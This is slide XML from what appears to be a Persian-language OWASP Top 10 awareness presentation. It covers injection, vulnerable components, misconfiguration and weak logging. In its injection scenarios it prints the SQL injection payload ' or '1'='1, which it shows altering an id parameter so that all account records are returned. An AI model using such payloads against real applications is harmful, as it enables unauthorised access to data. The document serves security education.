                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها با استفاده از اجزای با آسیب پذیری های شناخته شده می توانند حفاظت های برنامه را تضعیف کنند و حملات و تأثیرات مختلف را فعال کنند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="8038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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>استفاده از کامپوننت‌هایی با آسیب پذیری‌های شناخته شده</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7" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="8970028"/>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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نظارت و ثبت وقایع ناقص</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، همراه با </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>عدم واکنش صحیح به حادثه</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، اجازه می دهد تا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مهاجم ها </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به سیستم های بیشتر حمله</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> کنند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>،</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> موقعیت خود را حفظ کنند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اقدام به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استخراج و یا نابود کردن داده ها</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ی بیشتری بکنند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. بیشتر مطالعات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نفوذ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> نشان می دهد زمان برای تشخیص </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نفوذ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> بیش از 200 روز است، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>که </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>معمولا توسط </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شرکت های</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> خارجی، به جای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نظارت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>داخلی، شناسایی می شود.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Freeform 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="8910628"/>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fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>لاگینگ و مانیتورینگ ناکارآمد</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 name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA334A99-A6CF-4DF0-BB88-4F315BF4201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66368" y="5550646"/>
            <a:ext cx="1443106" cy="646331"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>تنظیمات اشتباه امنیتی</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو #1: یک برنامه با استفاده از داده های نا مطمئن در ساختار درستور فراخوانی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> آسیب پذیر زیر استفاده می کند : </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRP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gn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو#2: به طور مشابه، اعتماد کورکورانه نرم افزار به چارچوبها ممکن است منجر به نمایش داده هایی که هنوز آسیب پذیر هستند (به عنوان مثال، زبان پرس و جو حالت خواب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(HQL)) Hibernate Query Language  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را دنبال کند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="1">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1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در هر دو مورد، مهاجم مقدار پارامتر &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&gt; را در مرورگر خود تغییر می دهد: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به طور مثال:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</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gn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>این معنای هر دو پرسش را تغییر می دهد تا تمام رکورد ها را از جدول حساب بازگرداند. حملات خطرناک بیشتر می تواند داده ها را تغییر داده یا حذف کند یا حتی روال ذخیره شده را فراخوانی کند. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه کاربردی در شرایط زیر به حمله آسیب پذیر است: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ورودی های ارائه شده توسط کاربر اعتبار سنجی یا فیلتر نشوند. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>داده های خصمانه به طور مستقیم با استفاده از پرس و جو های پویا و یا درخواست های غیر پارامتریک برای مفسر بدون آگاهی از متن مورد استفاده قرار می گیرد. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>داده های خصمانه در پارامترهای جستجو در نگاشت شیء-ارتباطی (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برای استخراج  همه اطلاعات یا اطلاعات حساس استفاده می‌شود.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="just" rtl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>داده های خصمانه به طور مستقیم استفاده می شود یا پیوند داده می شوند با دستورات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> یا دستور حاوی هر دو ساختار و داده های خصمانه در پرس و جوهای پویا، دستورات و روش های ذخیره شده.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برخی از تزریقات رایج عبارتند از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، دستور </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و زبان بیان (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>EL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) یا تزریق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OGNL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. مفهوم در میان همه مفسرها یکسان است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بررسی کد منبع بهترین روش تشخیص این است که آیا برنامه کاربردی شما برای تزریق آسیب پذیر هستند یا خیر، با تست کامل خودکار تمام پارامترها، سرصفحه ها، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
